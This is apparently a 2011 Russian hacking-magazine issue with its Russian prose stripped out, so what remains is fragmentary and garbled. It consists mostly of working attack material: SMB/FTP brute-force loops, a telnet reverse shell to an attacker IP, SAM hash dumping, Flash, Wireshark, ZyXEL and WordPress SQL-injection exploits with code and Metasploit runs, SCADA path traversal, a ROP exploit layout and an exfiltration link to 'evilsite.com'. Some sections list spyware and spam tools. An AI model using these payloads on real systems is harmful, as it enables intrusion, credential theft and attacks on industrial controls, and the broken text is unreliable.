Himikat,
caps12-MultiScanner.
forum.antichat.net/thread266146.html.
caps12-security.blogspot.com.
, - - .

. ,
.

. .
. 13 , . X 07 /150/ 2011

, ftp-
| find "Name" && echo 10.10.10.%i

ftp-:
C:\> for /L %i in (1,1,1024) do echo Checking Port %i: >> ports.txt & echo open 192.168.0.1 %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt 2>>ports.txt


SMB:
C:\> for /f %i in (user.txt) do @(for /f %j in (pass.txt) do @
echo %i:%j & @net use \\10.10.10.10 %j /u:%i 2>nul && echo %i:%j
>> success.txt && net use \\10.10.10.10 /del)

, : , -, , .
.
. ,
telnet. ,
, Vista.
, nix , .
,
:
telnet [attacker_IPaddr] [port1] | /bin/bash | telnet
[attacker_IPaddr] [port2]

.
-.

,
. ,
, , .
. :
1) ;
2) ;
3) ;
4) .

,
MSF


:
ORACLE.

:
Oracle
TNS listener.
.
, ,
, login denied, . , ,
.
, .
, , ,
.

( )
ora-userenum. OAK (Oracle Assessment Kit),
David Litchfield (www.databasesecurity.com/dbsec/OAK.
zip). ,
.
:
ora-userenum.exe 192.168.0.1 1521 ORCL1 userlist.txt

192.168.0.1 1521 Oracle;


ORCL1 SID ;
userlist.txt (
OAK).
, , .

:
METASPLOIT
FRAMEWORK.

nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=ORCL <target>

DNS-:

:
MSF .
. . , . , , . , ,
MSF .
,
, - .

BackTrack. , BT,
. , ,
- , MSF .
Nmap NSE (Nmap Scripting Engine)
. , , . : nmap.org/nsedoc.
. - snmp-:
nmap -sU -p161 --script=snmp-brute --script-args=snmplist=communities.txt <target>

nmap -p53 --script dns-zone-transfer --script-args dnszonetransfer.domain=example.com <target>

SMB-.
MS08-067:
nmap -p445 --script=smb-check-vulns <target>

MSSQL- (,
) :
nmap --script broadcast-ms-sql-discover

200. , ,
.

dropbox

, -sU udp;
-p161 snmp ;
--script=snmp-brute , ;
--script-args=snmplist=communities.txt .
MSF.
, MSF Win7.
Oracle (
MSF Win):


:
WINDOWS.

:
,
. , c.
.
NTLM- .
gsecdump, fgdump. .
-, (- ). . -, 64- , .
, NTLM- (MS Cache)
Windows. -
,
.
Cain&Abel (www.oxid.it/cain.html), python (code.google.com/p/creddump).
creddump Windows, pycrypto
(www.amk.ca/python/code/crypto). ,
, (hives),
.

ntbackup.exe. ,
. ,
Volume Shadow Copy (VSS).
. , ,
:
Ntbackup.exe backup systemstate /j "Blah-blah-blah" /f
"c:\backup.bkf"

backup , ;
Systemstate
;
/j "Blah-blah-blah"
DVD
;
/f "c:\backup.bkf"
.
dvd
. ,
,
.
. XP 500 . ,
( ) .
( ) .
, C:\WINDOWS\system32\config
, ( )
HKEY_CURRENT_CONFIG System
%systemroot%\repair. HKEY_CURRENT_USER Ntuser.dat
. - HKEY_LOCAL_MACHINE\SAM Sam
, . ,
HKEY_LOCAL_MACHINE\Security Security
, , 10 HKEY_LOCAL_MACHINE\Software Software
, ,
HKEY_LOCAL_MACHINE\System System
. , ( )
HKEY_USERS\.DEFAULT Default
, . Vista 2008 Microsoft
? ntbackup. , .
liveCD, .
. , . ntbackup.exe, ntmsapi.dll,
vssapi.dll %systemroot%\system32 XP

, , , . .
2008
.
? , .
.
Vista 2008 (
R2) : NTBackup can be used under Windows Vista and Windows Server 2008 by enabling the Removable Storage Manager component in Turn Windows features on or off control panel. ,
--! ! Pass The Hash!
. , Win 7 2008
R2 ( ) .

,
. ,

.
:
pwdump.py SYSTEM SAM

( ):
lsadump.py SYSTEM SECURITY
:
cachedump.py SYSTEM SECURITY

, . z



iv (ivinside.blogspot.com)
pikofarad (115612, . , .1)

, ! ,
,
. ,
!

01

ADOBE FLASH
PLAYER 10.2.153.1 SWF

CVSSV2
9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)
BRIEF
: 11 2011
: sinn3r
CVE id: CVE-2011-0611
Flash Player ,
flash-.
flash- ,
, , , .

.
Adobe Flash Player,
- ,

, , ,
. :
.
: Adobe Flash Player, Adobe Reader Acrobat,
Microsoft Word/Excel ( .wf- doc- xls-
). , Adobe
Reader X sandbox , . , :).


EXPLOIT
0x100d01f6
Flash10o.ocx ( Adobe Flash Player 10.2.153.1).
ActionScript, :
Date.prototype.c_fun = SharedObject.prototype.getSize;
Date.prototype.getDay = function ()
{
this.c_fun();
};
var eval(0) = new Date(1.41466385537348e-315);
(eval(0)).getDay();

,
, ,
, SharedObject.prototype.getSize(),
Date ,
SharedObject.prototype.getSize. Date 1.41466385537348e-315, 0x11111110, , ,
heap spraying.
Date.c_fun(),
SharedObject.prototype.getSize(), Date
SharedObject,
, Date (0x11111110),
.
metasploit, :
msf > use exploit/windows/browser/adobe_flashplayer_flash10o

Flash10o.ocx
msf exploit() > set PAYLOAD windows/exec
PAYLOAD => windows/exec
msf exploit() > set CMD calc.exe
CMD => calc.exe
msf exploit() > exploit
[*] Exploit running as background job.
msf exploit(adobe_flashplayer_flash10o) >
[*] Using URL: http://0.0.0.0:8080/Jk32OyCPJ0NUR6B
[*] Local IP: http://192.168.2.20:8080/Jk32OyCPJ0NUR6B
[*] Server started.

. (http://192.168.2.20:8080/Jk32OyCPJ0NUR6B)
, ,
Internet Explorer ...
TARGETS
IE 6/7 Windows XP SP3 Windows Vista.
SOLUTION
Adobe Flash Player.

02


WIRESHARK <= 1.4.4
PACKET-DECT.C

CVSSV2
9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)


BRIEF
: 18 2011
: Paul Makowski ,
sickness POC, corelanc0d3r , ROP + metasploit.
CVE id: CVE-2011-1591
Wireshark ( Ethereal)
, . .
, Wireshark,
tcpdump, Wireshark

.
,
(promiscuous mode).
Wireshark
,
.
pcap, , . , Wireshark
, ,
, ,
.
EXPLOIT
( wireshark 1.4.1, packet-dect.c, 1886):


Wireshark
...
/* fill B-Field */
if(pkt_len>DECT_PACKET_INFO_LEN+2)
    memcpy((char*)(&(pkt_bfield.Data)), (char*)(pkt_ptr+8),
           pkt_len-5-8); // <--- length comes from the packet and is not checked against the 128-byte Data buffer
else
    memset((char*)(&(pkt_bfield.Data)), 0, 128);
pkt_bfield.Length=pkt_len-DECT_PACKET_INFO_LEN-8;


:
# tcpreplay -i ath0 -t test.pcap

wireshark .
,
metasploit , :

...

pkt_bfield dect_bfield, :
struct dect_bfield
{
    guint8 Data[128];
    guint8 Length;
};

, 128-
Data, .
,
pcap- . , ,
scapy:
#!/usr/bin/env python
from scapy.all import *  # Scapy 2.x exposes Ether and wrpcap through scapy.all
wrpcap("test.pcap",Ether(type=0x2323)/("A"*1000))

wireshark, -


msf exploit(wireshark_packet_dect) > use exploit/windows/fileformat/wireshark_packet_dect
msf exploit(wireshark_packet_dect) > set PAYLOAD windows/exec
PAYLOAD => windows/exec
msf exploit(wireshark_packet_dect) > set CMD calc.exe
CMD => calc.exe
msf exploit(wireshark_packet_dect) > exploit
[*] Creating 'passwords.pcap' file ...
[*] Preparing payload
[*] Writing payload to file, 1554 bytes
[*] Generated output file /opt/framework-3.6.0/msf3/data/exploits/passwords.pcap

wireshark, .
:
# tcpreplay -i ath0 -t /opt/framework-3.6.0/msf3/data/exploits/passwords.pcap

:)
TARGETS
Win32 ( DEP & ASLR).

, flash-
SOLUTION
Wireshark.

03

ZYXEL ZYWALL USG

CVSSV2
9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)
BRIEF
ZyWALL USG
ZyXEL ,
, c,
.
RedTeam Pentesting
,
: .
, .
-
.
EXPLOIT
ZyXEL ZyWALL USG zip-,
zip- .
, 2.21(BQD.2) ZyWALL USG 20
(ZyWALL USG 20_2.21(BDQ.2)C0.zip)
:
221BDQ2C0.bin
221BDQ2C0.conf (7354 bytes)
221BDQ2C0.db
221BDQ2C0.pdf
221BDQ2C0.ri
firmware.xml

221BDQ2C0.bin 221BDQ2C0.db,
, zip- (,

/usr/bin/file).
:
$ unzip -l 221BDQ2C0.bin
Archive: 221BDQ2C0.bin
Name
----
compress.img
db/
db/etc/
db/etc/zyxel/
db/etc/zyxel/ftp/
db/etc/zyxel/ftp/conf/
db/etc/zyxel/ftp/conf/htm-default.conf
db/etc/zyxel/ftp/conf/system-default.conf (7354 bytes)
...
filechecksum
filelist
fwversion
kernelchecksum
kernelusg20.bin
wtp_image/
-------
24 files
$ unzip -l 221BDQ2C0.db
Archive: 221BDQ2C0.db
Name
----
db_remove_lst
etc/
...
etc/zyxel/
etc/zyxel/ftp/
etc/zyxel/ftp/.dha/
etc/zyxel/ftp/.dha/dha_idp/
etc/zyxel/ftp/cert/
etc/zyxel/ftp/cert/trusted/
etc/zyxel/ftp/conf/
etc/zyxel/ftp/conf/htm-default.conf
etc/zyxel/ftp/conf/system-default.conf (7354 bytes)
...
filelist
-------
31 files

, 221BDQ2C0.conf
system-default.conf
.

,
:
PkCrack ;
Elcomsoft Advanced Archive Password Recovery
.


ZyXEL

compress.img unsquashfs.
ZyWALL USG -
Apache. , . mod_auth_zyxel.so
/etc/service_conf/httpd.conf,
compress.img.
AuthZyxelSkipPattern,
:
AuthZyxelSkipPattern /images/ /weblogin.cgi /I18N.js /language

CGI-. , ,
:
https://192.168.0.1/cgi-bin/export-cgi?category=config&arg0=startup-config.conf

Apache
CGI-. ,
/images/ , export-cgi
:
https://192.168.0.1/cgi-bin/export-cgi/images/?category=config&arg0=startup-config.conf

/images/
AuthZyxelSkipPattern, .
,
.
, file_upload-cgi, , , . /images/, .
, startup-config.conf, , , . , ,
.
, , /
:
$ curl --silent -o startup-config.conf "https://192.168.0.1/cgi-bin/export-cgi/images/?category=config&arg0=startup-config.conf"
$ curl --silent -F ext-comp-1121=50 -F file_type=config -F nv=1 -F "file_path=@startup-config.conf;filename=startup-config.conf" https://192.168.0.1/cgi-bin/file_upload-cgi/images/

TARGETS
ZyXEL USG, 25 2011 ,
.
SOLUTION
, 25 , -.

04

SQL XSS
WORDPRESS SERMONBROWSER
PLUGIN

CVSSV2
7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
BRIEF
Ma3sTr0-Dz
.
SQL
.
, (
).

WordPress SermonBrowser
EXPLOIT
php,
,
. ( ):
<?php
$t=array(
    "db_usr"=>"user()",
    "db_ver"=>"version()",
    "db_nam"=>"database()",
    "usr_nm"=>"user_login",
    "passwd"=>"user_pass"
);
function text2hex($string) {
    $hex = '';
    $len = strlen($string);
    for ($i = 0; $i < $len; $i++) {
        $hex .= str_pad(dechex(ord($string[$i])), 2, 0, STR_PAD_LEFT);
    }
    return $hex;
}
foreach($t as $r=>$y){
    $x=@file_get_contents($argv[1].
        "?sermon_id=-1/**/UnIoN/**/SeLeCt/**/group_concat(0x".
        text2hex("<$r>").
        ",$y,0x".text2hex("<$r>").
        "),2+from+wp_users+where+ID=1--"
    );
    preg_match_all("{<$r>(.*?)<$r>}i",$x, $dz);
    echo $u = ($dz[1][0]) ? "[-] $r : ".$dz[1][0]."\n" :
        "[-] $r : Failed !\n";
}
?>

XSS WordPress SermonBrowser

TARGETS
WordPress SermonBrowser Plugin <= 0.43
SOLUTION
0.44.1 . z



(http://oxdef.info)

-.
OPERA


. ,
Google Chrome.
Opera. ,
!

, -
. :
.
,
-. Opera, , -
. ,
Opera ( ?)
. Chrome
Opera.
.

Opera Google
Chrome. , HTML, CSS JavaScript,
-


W3C Widgets specification.


What's in an Opera extension? (bit.ly/k5WkoL).
. Opera
( ):
( index.html)
;
, ,
-;
JavaScript- CSS- ,
- (, ,
mailto: );
config.xml ( manifest.json Google
Chrome) -
: , ,
;

.

HTTP://WWW
links
W3C Widgets
specification:
www.w3.org/TR/widgets.

XSS Google Mail Notifier


Opera
(UserJS),
,
, ,
JavaScript-.
-
( ).
:

;
HTML-
(, );
- ( ) ;

JavaScript.

,
,
, :
// ==UserScript==
// @include http://example.com/*
// ==/UserScript==
(function ()
{
    var links = document.getElementsByTagName('a');
    for(var i = 0; i<links.length; i++) {
        if (links[i].href.indexOf('http://' + document.domain) != 0) {
            links[i].innerText = '[->] ' + links[i].innerText;
        }
    }
})();

,
,
,
( , ).


Google
Mail Notifier
:
<-> <->
/ <->

, /
, Opera
Extensions API :
window.widget, opera.extension opera.contexts
, ,
.

.
(
)

.
,
..

:
goo.gl/LwQ50.
Opera Extensions API:
www.opera.com/docs/apis/extensions/.
XSS:
goo.gl/1ey4L.

:
goo.gl/BIKKM.
Widget Access
Request Policy:
www.w3.org/TR/widgets-access/.

UserJS-
Opera: www.opera.com/docs/userjs/.

XSS


Opera Google Chrome (,
..).
Google Mail Notifier.
, ,
Google Chrome, ,
XSS.

.
, , .
, , . ,

(js/menu.js):

WARNING
warning

,

.

...
// Check if there are Messages to display
if(event.data.msg && event.data.msg.length > 0)
{
    // Add every message
    for(var i=0; i < event.data.msg.length; i++)
    {
        var tooltip = "<div class='tooltip'><p><u>" +
            lang.popup_to + " " + event.data.msg[i].sendermail +
            "</u><br/>" + lang.popup_from + " " +
            event.data.msg[i].authormail + "<br/><br/></p><p>" +
            event.data.msg[i].summary + "</p>"
        var msg = $('<div></div>').addClass('message').attr(
            "title", tooltip).tooltip({
                left: -15
            })
            .html("<strong>" + event.data.msg[i].authorname +
                "</strong> : " + event.data.msg[i].title).click(
            {
                link: event.data.msg[i].link
            }, LoadLink);
        $('#message_box').append(msg);
...

Opera

,
HTML-.
( Opera Google
Chrome) ,
,
, , RSS-
. ,

.
-
JSON!
JavaScript-, eval(),
, :

var msg = eval("(" + response_text + ")");

API
JSON-:
var msg = JSON.parse(response_text);


, .

XSS- , , . Opera
- ( Google Chrome),
.
. , ,
XSS-:
,
,
;
, widget.preferences ,
,
Reddit Envelope;
Google Notifier
(, ) ;


- (. ).


, , . ,
JavaScript ,
document.cookie .
Opera
, :
,
(, -)
, , ,
API-
(, XMLHttpRequest)
(, iframe, script, img).


, :
...
<!-- Access Policy -->
<access origin="https://mail.google.com"/>
<access origin="https://www.google.com"/>
...

. , ,
,
:
//...
var a = document.createElement('a');
var d = document.getElementById('open');
a.href = "http://evilsite.com/sniff.php?d=...";
a.id = "foo";
a.innerText = 'Open GMail Tab';
d.parentNode.replaceChild(a, d);

Google Chrome, Opera


. , ,
UserJS, - , :
JavaScript-
,
-. ,

,
-.

<access>
,
. , , ,
,
! Google
www.google.com, .
,
XSS-:

, Opera . ,
( )
, DOM.
. ,
, .

(*)
origin ,
;
subdomains
(-
).

Opera ,
Google Chrome. ,
.
,
, - , -
( , ) ,
Opera . ,
, .
, . z

,
.
,

Outro



(kaminkov@itdefence.ru),

SCADA

Rockwell Automation 45%

Schneier Electrics 40%

Areva Teleperm XS 25%

Wonderware InTouch 30%

Tekla XPower 20%

Mitsubishi MX4 SCADA 30%

Netcon 3000 15%

Wonderware InTouch 45%


SCADA Axeda 34%
21%

metsoDNA 10%

RTA PLS 55%


GH SCADA 45%
PSI Control 33%

GE CIMPCity 45%
GE XA21 EMS 24%
Proficy SCADA iFIX 20%
Areva EMS SCADA 11%

Wonderware InTouch 44%

Siemens Win CC 49%

SOLONs SCADA 34%

ABB Ranger 34%


PcVue 11%
RsView SCADA 8%

SCADA Axeda 22%

View Star 750 55%


Pidpa 45%


Wonderware InTouch 45%

Proficy SCADA iFIX 30%

CitectSCADA 55%

CitectSCADA 20%

Siemens Win CC 45%

Motorola SCADA 5%

SCADA

. (rusin@itdefence.ru)

Stuxnet, ,
. ?
.
,
.
?

,
- . .
.
,
: ,
, , -


, . ,
, ( ).
: (SCADA), ,
.
,
SCADA, ,

154.68.54.XX

1.

3.

172.16.1.0
RS232

TCP/IP

MODBUS

10.0.1.0

2. APM SCADA

, ,
?

, 60%
SCADA
(Windows, Linux). (, ),
QNX,
( ),
(,
).

/ SCADA:
SCADA- ( , /
SCADA);
Tenable Nessus ( SCADA
);
Rapid7 Metasploit Project ( :
exploits/scada/ ).
,
,
nmap. ,
:
,
Stuxnet.

,
. -


( ) : (
,
-), (,
, ) ( , ).
1. .

IPSec SSL,
VPN. , . ,
()

. , .
IP-, ,
, .

. ,

.
GPRS/GSM-,
IP-
.
.

.
, ,
(RS-232 / RS-485)
MODBUS-, MODBUS-
TCP/IP Ethernet /
Industrial Ethernet .
2. - SCADA.
,

HTTP://WWW
links


.
,
,
,
RISI:
securityincidents.org.

DVD
dvd


Stuxnet
Trend Micro.
,
DVD
Tenable
Nessus,
SCADA.



Slave-, MODBUS
. , .
, Stuxnet
- , USB-
.
. SCADA, , ,
, .
,
- .
3. (BAN Business Area Network).
,
, .
. .

HMI -
.
.
, .

.
,
, -
. - BAN
: , , -
.

Stuxnet
NMAPa (5.51) ,
LUA NMAP Scripting
Engine, stuxnet-detect. Stuxnet SMB- :
nmap --script stuxnet-detect -p 445 <host>
, , Trend Micro.
DVD, (bit.ly/chokfa). ,
Stuxnet?
Stuxnet RPC-
. RPC-
() ,
( ). RPC .
(0x00), (0x04).
SMB-over-TCP (TCP 445), ,
Stuxnet (, MS10-061),
DCE/RPC (//browser ), UUID
. !

Stuxnet.
Trend Micro.


SCADA Firebird. ( ),
, .
,

.
.
,
. , Cisco
Router and Security Device Manager Cisco 7301,
CISCO SDM. ,
,
.
, :
level 15;
cisco (
,
).
, show running
config, . -

, .
,
. ,
:
, TCL,

;
, , CISCO Cisco IOS Embedded
Packet Capture (EPC) , .
, ,
,
EPC:
# EXEC
enable
# "pktrace1", 256 ,
#

CISCO
secret 7- CISCO-
secret 5 (CISCO type 5 passwords). secret 7,
, Cain and Abel
. ,
:
username jbash enable secret 5 $1$iUjJ$cDZ03KKGh7mHfX2RSbDqP.
username jbash password 7 07362E590E1B1C041B1E124C0A2F2E206832752E1A01134D

, md5,
,
, Passwords Pro, John The Ripper, EGB ,
. :
$1$FKKk$t2NOQP.vSScMbwJWERNU0/ (type "5"),
FKKk (salt)


:
openssl passwd -1 -salt FKKk cisco

cisco .


SCADA
# 100
monitor capture buffer pktrace1 size 256 max-size 100 circular
# ,
# FastEthernet, ,
#
monitor capture point ip cef ipceffa0/1 fastEthernet-type 0/1 both
#
monitor capture point associate ipceffa0/1 pktrace1
#
monitor capture point start ipceffa0/1
#
show monitor capture buffer pktrace1 dump

TCP 502,
, MODBUS TCP. , .
,
,


,
,

2008-2010 .
:
7 2008 , 2 Hatch (
, ), 48

( 2006
Browns Ferry -

);
2008 , Tennessee Valley Authority (TVA)
( 11
, 8 , 3 , 29 ), (GAO, HHS) 2000
.
, , ,
, ;
26 2008 , ,
.


CISCO, . , ,
- : , :
. ,
SCADA
DCOM Microsoft Windows,
.
( , )
. , , SDM,
. CISCO secret 7
MD5.

, .
IP-, .
,
SCADA-.
TCP 502-, MODBUS,

, , .
SCADA- ,

. , , .
SNMP- . ,
web-, SCADA -

MODBUS
MODBUS
: ASCII RTU. ( ,
)
. ASCII-
ASCII-.
.
ASCII- (:, ASCII 3A
hex) (CRLF, ASCII 0D 0A hex).
0-9, A-F.

. ,
( ) .



. , :
1) : KASKAD/Web_Clnt.dll/ShowPage?Web_Clnt.ini.
:
Project="C:\Program Files\Kaskad\Projects\KVisionDemoProject\kaskad.kpr"

2) : KASKAD/Web_Clnt.dll/ShowPage?../../../Projects/KVisionDemoProject/Configurator/Events.ini
3)
UserName=sysdba
Password= ( XOR 0x1B)
4) :
KASKAD/Web_Clnt.dll/ShowPage?../../../Projects/KVisionDemoProject/Configurator/Stations.ini
ClntIPAdr1=127.0.01
= 3050

5) TCP 3050 ( Firebird):


\x00\x00\x00\x35\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a
\x4a\x4a\x4a

6) SCADA:
INSERT INTO USERLIST (USERNAME, USERPASSW, NAME, GRPNAME,
FULLNAME, FLAGS, FLAGS_, ALLOWTIME, REGISTERTIME,
LASTENTERTIME, LASTPWDCHANGETIME, PWDKEEPPERIOD, STATIONS,
DROPTIMEOUT, PSPRDACCESS, PSPWRACCESS, PSPRDACCESS_,
PSPWRACCESS_) VALUES ('ITD', '745F87A6B56BACAB', 'itd',
'', ', 3, null, null, '2002-01-30 13:11:36.0', '2002-01-30 13:11:36.0', '2002-01-30
13:11:36.0', 0, null, null, null, null, null, null);

MODBUS !

, MODBUS,
. , .
1) , PLC
listen only. PLC
, .
MODBUS (Master) ( ). (Slave)

MODBUS .

.
(HOST) .
. PLC- listen only
slave-,
. Slave- , .
.
2) (,
) , . , . , Modbus SCADAPack
ClearSCADA,
60 260 . ,
, :).
3) , .
web- ftp-.
, Appweb Embedded Web Server
, Apache Benchmarking
Tool (ab), :
ab -n 1000 -c 50 http://xxx.xxx.xxx.xxx/index.html
-n
-c

4) .
MODBUS, , , ,
, . -
, ARP-.

:
,
, SCADA.
,
- ( ).
, , , 2. , , ,
, , ,
. ! z


,
.
? , ,
. .

Trustwave, 32% . ,
24% , : , VPN + socks chain , . Verizon : 65%
.



, Trustwave . ,
, , .
.



, , Trustwave, - ,
. Verizon : 800
, , 90% - , 10% - .


Verizon
SQL-
CMS
DoS

PCI DSS
, . ,
PCI DSS, . ,
, - , , .

% PCI DSS



Digital Security (twitter.com/asintsov))

0DAY


Music Maker 16

, !
MAGIX AG Music
Maker 16.
, ,
DEP ASLR.

, , ,
(
Digital Security).
MAGIX AG
. :
Acidgen Corelan Team
MAGIX AG Music Maker 16.
,
,
PoC. , .

, , .
, MAGIX AG - ,
. , :
, PoC -
.


0day

Music Maker 16, .


,
. ,
, . ,

.
, , .
, , .mmm, .
, - _Demo.mmm
HEX- (, 010-Editor). , , ( )
.
.
, , Music Maker
. ,
,

- 2,

, . ,
, , ,
''. ,
.
, .
( Immunity Debugger)
Music Maker .

. Access Violation,
, ,
'a' .mmm . , ,
0day- , - .
, Acidgen ,

Corelan Corelancod3r,
pvefindaddr. , . , , ,
:).

, ,
:
PoC, Music Maker . , ,
. , ,
. : , @ontrif,
!
: SEH- pop
REG/pop REG/retn, ,
- - SafeSEH ( , safeSEH).
, Access Violation,
pop/pop/retn.
, 8 , ESP
8 ( ).
, , SEH-,
,
SEH-. , RETN
,
EIP ,
SEH.
JMP +0x12 ( ,
SEH-, ,
, ). ,

.mmm-
:
aaaaaaaaXXXXYYYYZZZZZZZZZZZ
aaaaaaaa
XXXX SEH, 0x909010EB
(JMP +0x12/nop/nop)
YYYY SEH-,
pop/pop/retn
ZZZZ NOP

:
1. ;
2. Access Violation;
3. YYYY;
4. POP/POP/RETN => XXXX;
5. XXXX = JMP +0x12;
6. ZZZZZ, . .
, .
. Windows 7 x64, DEP
ASLR. - ontrif YYYY
dll', - ASLR BaseFixUP.
YYYY , , YYYY ZZZZ , DEP
. ,
Windows XP. ontrif
, YYYY .
Access Violation , (- ).

, YYYY! ,
, ontrif.
YYYY.
ASLR, DEP.

ROP-

- . ,
, . ,
.
, ,
. SEH
508 ! - ,
. Corelancod3r -
+ egg-hunter- ( , --,
).
, .
, :
SEH 100. , +
. , -


- 1

metasploit- pvefindaddr , SEH


, , , .
: SEH (YYYY) ROP-
, ESP - ,
ROP- . YYYY ROP, ESP, RETN,
ROP- ROP-
. Corelancod3r'.
ASLR LTKRN14N.dll LTDIS14n.dll. ,
ADD ESP,4F8 # RETN 4 0x20012026 (
, ASLR).
Access Violation
, aaaaaaaa.
, RETN 4
, , ADD ESP, 40 # RETN. ,
ZZZZ, -.

ROP-

ROP- -,
.
.
, - aaaaaaaa
, ,
:
PPPPPPPP/FFFFFFFFaaaaaaaaXXXXYYYYZZZZZZ


PPPPPPPP
FFFFFFFF
aaaaaaaa
YYYY
ZZZZ

,
ROP: 0x20012026
SEH-ROP: 0x20012026
ROP-

. ,
: aaaaaaaaXXXXYYYYZZZZZZ
ROP-.
FFFF, ROP- , FFFF
VirtualAlloc. ,
. , , VirtualProtect,

.
, VirtualAlloc, ,
, ,
.
VirtualAlloc kernel32.dll,
- ASLR, LTDIS14n.dll ,
.data-, , - ASLR.
0x1FFAF160 VirtualAlloc. FFFF, -
. - (ZZZZZ) (FFFF), , FFFF,

!

metasploit-
ESP FFFFF, ROP-, FFFF ,
FFFF. FFFF- ,
PPPPPPPP. , 750 , . FFFFFFFF :
QQQQ1111222233334444WWWWJJJJJJ
QQQQ
- - 2
1111222233334444 - VA, 1
WWWW
- VA,
JJJJJJ
- stage 0 , PPPPPPPP

, , PPPP
, WW..WW
FFFF-, PPPP . stage 0 PPPP, VA,
PPPP , .
, . ,
, :). , Metasploit.

aaa_data = aaa_header # MMM-
aaa_data << "\x00"*1680
aaa_data << aaa_list
aaa_data << "\x00"*25
####
aaa_data << "C:\\aaa\\"
# 7.
aaa_data << shellcode
#
aaa_data << "a"*(target['Size']-shellcode.length)
aaa_data << "a"*328
#
aaa_data << "\x00"*16
####
aaa_data << "x"*320
# 4. -2
aaa_data << rop_gadgets2
# 5. stage 0
aaa_data << shell_jmp
aaa_data << "a"*61
#### ,
#
# 2. ROP-: ADD ESP, 40 / RETN
aaa_data << rop_jmp*32
aaa_data << "a"*16
# 1. SEH, YYYY
aaa_data << [target.ret].pack('V')
# 3. 1 RETN
aaa_data << rop_nop*10
# 4. 1
aaa_data << rop_gadgets
aaa_data << "a"*31337

.
.

,
, . egg-hunter,
. Corelancod3r ,
egg-hunter' :).
750 , .
, ,
, , ,
DEFCON-. defcon-russia.ru, ( ). -
, -,
, WEB-, , , ,
.
hackerspace, ,
, .. ,
, ,
.
! z



(icq 884888, snipper.ru)

X-TOOLS
: XMProxy
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: xhugo

: ,
xxx.xxx.xxx.xxx;xxx xxx.xxx.xxx.xxx:xxx.
, .

, XMProxy

-.


, .

: Hack Record Book


: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: Kronus and Svet

: ProxySocksGrabber
: *nix/win
: G1yuK


XMProxy ,
.
,
, , , geoip .
.

. : ,
,

.

: ,
.

, .
, ,
-. ,
-.
GeoIP
. ,
proxy:port - .


-

,

, .

spys.ru, ip
, javascript.
,
, , ,
.
:
1. proxy (grabber.py -t 0);
2. socks (grabber.py -t 1).

'-t'.

.
,


.
SQL- (,
n- ) .
!
Hack
Record Book

.
:
, ;
PR (
);

;
;
;
;
;
;
status bar;

( url more);

HTTP ;
drag & drop ;
settings.ini;
SQLite;
.NET 3.5.
:
1. KEY ;
2. .db ;
3. ,
,
, .


bit.ly/jFexpH.

: VK Video Spammer
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: Ildon



. ,
, VK Video Spammer .
:
50
;
50
;
;
;
;
;
;
-
(
);
;
;
.
, VK ,

.



mail.ru.
:


: MicSpy++
Nightmare!

,
. :
1. , ( ,
);
2. ;
3. KHz WMA-
( 8, 16 32).
: (,
10 )
WMA- 03.03.2011.17.17.17.wma ( ).
:
= ( 10
600 , 1,8 ).
:
MicSpy++.exe C:\randomfolder\ 1800000 16

.
:
C:\randomfolder\
;
1800000 ;
16 WMA KHz.


bit.ly/jnzg7t.

: [mail.ru] Question
Brute
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: ZeaL


,
mail.ru.

: [mail.ru] Question
Checker
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: ZeaL


,

.
, ,
- 123,
qwerty ..
, ,
:
;
(

,
);
([mail.ru]
Question Brute 1.04).

: MicSpy++
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: Nightmar

,

.

;
m.mail.ru (,
);
source-;
;
source;

mail.ru;
;
.


-. z


MALWARE
deeonis (deeonis@gmail.com)

,

-,
, .
, .
-,
.

, .

exe,
.
Windows. ,



, - .
:
,
. .

Process Explorer


, - , .
, - .
-
.
-, .

.
Windows, , , C:\Documents and Settings\admin\ \
\\. , admin,
All Users Default User.

, , API- CopyFile,
.

,
.
,
,
.
Windows
9- 98- 95- .
win.ini, [windows], , , run=_.
system.ini, [driver32]
_.
_=_ .
, .
Windows.
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\ RunOnce, , . ,
IE,
( ),

,
SENIOR MALWARE ANALYST,
HEURISTIC DETECTION GROUP, KASPERSKY LAB.
.
, -,
,
-
.
, .
, ,
Visual Basic Delphi. Windows
.
,
,
/, .
, ,
,
. , MBR

. , .

: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\.
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit\,
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\,
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\.
( exe, ,
dll).
, dll
explorer.exe, ,
Safe Mode.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\_\


MALWARE

IE BHO
_ ,
Debugger.
. , , ,
txt-, ,
,
.
.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run, .
, , - , ,
(
),
, , HiJackThis.

, ,
:
,
.
Windows.
, -, , .
, - ,
. , , ,

. ,
, , ,
, Visa MasterCard .
,
Fraud Antivirus, .
, . , - , ?
, -


.
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System.
DisableRegistryTools.
1, regedit.exe .
DisableRegedit,
HKCU-
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System.
DisableTaskMgr HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System. ,
. -
. HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer RestrictRun
, RestrictRun,
exe-,
, .

DisallowRun,
.

. ,
DisallowRun RestrictRun.
- ! ,
, HKEY_CLASSES_ROOT\exefile\shell\open\command.
